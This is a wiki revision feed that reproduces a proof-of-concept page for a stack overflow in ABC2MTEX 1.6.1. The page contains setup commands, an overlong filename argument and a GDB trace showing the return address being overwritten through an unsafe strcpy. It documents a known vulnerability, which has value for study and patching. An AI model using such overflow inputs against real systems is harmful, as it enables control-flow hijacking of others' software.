<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>ABC2MTEX 1.6.1 命令行堆棧溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T08:39:56Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2005&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann &lt;yagemann@gatech.edu&gt; Vendor Homepage: https://abcno...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ABC2MTEX_1.6.1_%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%A0%86%E6%A3%A7%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2005&amp;oldid=prev"/>
		<updated>2021-05-02T04:24:52Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann &amp;lt;yagemann@gatech.edu&amp;gt; Vendor Homepage: https://abcno...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow&lt;br /&gt;
Date: 2019-08-13&lt;br /&gt;
Exploit Author: Carter Yagemann &amp;lt;yagemann@gatech.edu&amp;gt;&lt;br /&gt;
Vendor Homepage: https://abcnotation.com/abc2mtex/&lt;br /&gt;
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz&lt;br /&gt;
Version: 1.6.1&lt;br /&gt;
Tested on: Debian Buster&lt;br /&gt;
&lt;br /&gt;
An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return&lt;br /&gt;
address from the openIn function by providing a long input filename. This&lt;br /&gt;
carries similar risk to CVE-2004-1257.&lt;br /&gt;
&lt;br /&gt;
Setup:&lt;br /&gt;
&lt;br /&gt;
$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz&lt;br /&gt;
$ tar -xzf abc2mtex1.6.1.tar.gz&lt;br /&gt;
$ make&lt;br /&gt;
&lt;br /&gt;
$ gcc --version&lt;br /&gt;
gcc (Debian 8.3.0-6) 8.3.0&lt;br /&gt;
Copyright (C) 2018 Free Software Foundation, Inc.&lt;br /&gt;
This is free software; see the source for copying conditions.  There is NO&lt;br /&gt;
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.&lt;br /&gt;
&lt;br /&gt;
PoC:&lt;br /&gt;
&lt;br /&gt;
$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA&lt;br /&gt;
&lt;br /&gt;
GDB:&lt;br /&gt;
&lt;br /&gt;
We're going to place a breakpoint before and after abc.c:241 to show the overflow.&lt;br /&gt;
&lt;br /&gt;
$ gdb -q ./abc2mtex&lt;br /&gt;
Reading symbols from ./abc2mtex...done.&lt;br /&gt;
(gdb) break abc.c:241&lt;br /&gt;
Breakpoint 1 at 0x4139: file abc.c, line 241.&lt;br /&gt;
(gdb) break abc.c:242&lt;br /&gt;
Breakpoint 2 at 0x414c: file abc.c, line 242.&lt;br /&gt;
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA&lt;br /&gt;
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA&lt;br /&gt;
&lt;br /&gt;
Breakpoint 1, openIn (filename=0x7fffffffe240 'A' &amp;lt;repeats 120 times&amp;gt;, &amp;quot;FEDCBA&amp;quot;) at abc.c:241&lt;br /&gt;
241                     (void) strcpy(savename,filename);&lt;br /&gt;
(gdb) bt&lt;br /&gt;
#0  openIn (filename=0x7fffffffe240 'A' &amp;lt;repeats 120 times&amp;gt;, &amp;quot;FEDCBA&amp;quot;) at abc.c:241&lt;br /&gt;
#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273&lt;br /&gt;
(gdb) c&lt;br /&gt;
Continuing.&lt;br /&gt;
&lt;br /&gt;
Breakpoint 2, openIn (filename=0x7fffffffe240 'A' &amp;lt;repeats 120 times&amp;gt;, &amp;quot;FEDCBA&amp;quot;) at abc.c:242&lt;br /&gt;
242                     (void) strcat(filename,&amp;quot;.abc&amp;quot;);&lt;br /&gt;
(gdb) bt&lt;br /&gt;
#0  openIn (filename=0x7fffffffe240 'A' &amp;lt;repeats 120 times&amp;gt;, &amp;quot;FEDCBA&amp;quot;) at abc.c:242&lt;br /&gt;
#1  0x0000414243444546 in ?? ()&lt;br /&gt;
#2  0x00007fffffffe4f8 in ?? ()&lt;br /&gt;
#3  0x0000000200000000 in ?? ()&lt;br /&gt;
#4  0x0000000000000000 in ?? ()&lt;br /&gt;
(gdb) c&lt;br /&gt;
Continuing.&lt;br /&gt;
file &amp;quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA&amp;quot; does not exist&lt;br /&gt;
&lt;br /&gt;
Program received signal SIGSEGV, Segmentation fault.&lt;br /&gt;
0x0000414243444546 in ?? ()&lt;br /&gt;
(gdb) quit&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>